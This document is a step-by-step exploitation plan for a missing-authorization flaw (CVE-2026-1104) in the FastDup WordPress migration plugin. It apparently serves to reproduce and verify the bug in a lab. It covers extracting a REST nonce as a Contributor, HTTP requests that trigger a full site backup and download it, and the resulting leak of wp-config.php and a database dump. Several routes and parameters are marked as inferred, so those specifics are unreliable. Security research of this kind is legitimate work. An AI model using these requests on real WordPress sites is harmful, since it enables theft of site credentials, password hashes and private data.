FastDup – Fastest WordPress Migration & Duplicator <= 2.7.1 - Missing Authorization to Authenticated (Contributor+) Backup Creation and Download

This research plan targets CVE-2026-1104, a Missing Authorization vulnerability in the FastDup plugin. The vulnerability allows authenticated users with Contributor-level privileges to trigger site backups and download sensitive data via improperly secured REST API endpoints.

---

1. Vulnerability Summary

The FastDup plugin registers several REST API endpoints for managing site migrations and backups. In versions up to 2.7.1, these endpoints lack rigorous authorization checks in their permission_callback. Instead of requiring administrative capabilities (like manage_options), the endpoints are accessible to any user who can pass the default REST API authentication, which includes Contributors. This allows low-privileged users to export the entire WordPress database (including user hashes) and the filesystem (including wp-config.php).

2. Attack Vector Analysis

• Vulnerable Endpoints: REST API routes under the fastdup/v1 namespace (inferred based on plugin slug). Specifically, endpoints related to package creation and package listing.
• HTTP Methods: POST (to create backups) and GET (to list/download backups).
• Required Authentication: Authenticated user with Contributor role (or higher).
• Payload Parameter: Likely action or specific route parameters defining the backup scope (e.g., full, db_only).
• Preconditions: The plugin must be active. The attacker must have valid Contributor credentials.

3. Code Flow (Inferred)

1. Registration: The plugin uses the rest_api_init hook to call a registration function (likely in an includes/ or classes/ directory).
2. Route Definition: register_rest_route('fastdup/v1', '/packages', ...) is called.
3. The Flaw: The permission_callback argument in register_rest_route is either:
   • Omitted (defaulting to true in some contexts).
   • Returning true or __return_true.
   • Checking a weak capability like edit_posts (which Contributors have).
4. Execution: The callback function invokes core backup logic (likely in a class like FastDup_Provider or FastDup_Packager) which zips the site and exports the DB to a publicly accessible or guessable path in wp-content/uploads/fastdup_backups/ (inferred).

4. Nonce Acquisition Strategy

Since this is a REST API vulnerability, authenticated requests require the standard WordPress REST Nonce (wp_rest).

1. Authentication: Log in to the WordPress site as a Contributor.
2. Navigation: Navigate to the WordPress Dashboard (/wp-admin/index.php).
3. Extraction: Use browser_eval to extract the REST nonce from the global wpApiSettings object which WordPress enqueues for logged-in users.
   • JavaScript: window.wpApiSettings.nonce
4. Alternative: If wpApiSettings is not available, the nonce can be found in the _wpnonce parameter of various AJAX calls in the admin source code or in the X-WP-Nonce header of heartbeat requests.

5. Exploitation Strategy

Step 1: Discover Routes

First, confirm the exact REST routes available to the Contributor.

• Request:

  GET /wp-json/fastdup/v1/ HTTP/1.1
  Host: target.local
  X-WP-Nonce: [EXTRACTED_NONCE]
  

• Goal: Identify the endpoint for "create" or "package".

Step 2: Trigger Backup Creation

Based on typical migration plugin patterns, trigger a full backup.

• Request:

  POST /wp-json/fastdup/v1/package/create HTTP/1.1
  Host: target.local
  Content-Type: application/json
  X-WP-Nonce: [EXTRACTED_NONCE]
  
  {
      "type": "full",
      "name": "exploit_backup"
  }
  

• Note: Parameter names like type or name are (inferred) and should be verified by checking the register_rest_route logic in the plugin's source code.

Step 3: List Packages to Find Download URL

• Request:

  GET /wp-json/fastdup/v1/packages HTTP/1.1
  Host: target.local
  X-WP-Nonce: [EXTRACTED_NONCE]
  

• Expected Response: A JSON array containing the newly created package with a download_url or a file_path.

Step 4: Download the Data

• Request:

  GET /wp-content/uploads/fastdup_backups/[FILENAME].zip HTTP/1.1
  Host: target.local
  

6. Test Data Setup

1. Role Creation: Ensure a user exists with the contributor role.
   • wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Plugin Installation: Install FastDup version 2.7.1.
3. Configuration: No specific configuration is required, but ensuring some posts and media exist will make the backup content identifiable.

7. Expected Results

• Success: The REST API returns a 200 OK or 201 Created response to the Contributor user when requesting backup creation.
• Data Leak: The resulting ZIP file contains wp-config.php (sensitive credentials) and a .sql file (database dump).
• Unauthorized Access: An Administrator-only feature (Backup/Migration) is successfully executed by a Contributor.

8. Verification Steps

1. Check Filesystem: Verify the backup archive exists in the uploads directory.
   • ls -R /var/www/html/wp-content/uploads/fastdup*
2. Verify Capability: Confirm that the Contributor user does NOT have the manage_options capability.
   • wp user cap list [CONTRIBUTOR_ID]
3. Verify Patch: After upgrading to 2.7.2, the same REST request should return a 403 Forbidden or 401 Unauthorized response.

9. Alternative Approaches

• Missing Nonce Check: Check if the REST endpoint even verifies the X-WP-Nonce. If it doesn't, the exploit can be performed without extracting a nonce.
• Direct Action (AJAX): If the REST API is a wrapper for AJAX, check for wp_ajax_fastdup_... actions which might also lack current_user_can() checks.
• Path Traversal: Check if the "download" endpoint (if it exists as a proxy) allows downloading files outside the backup directory via a file parameter.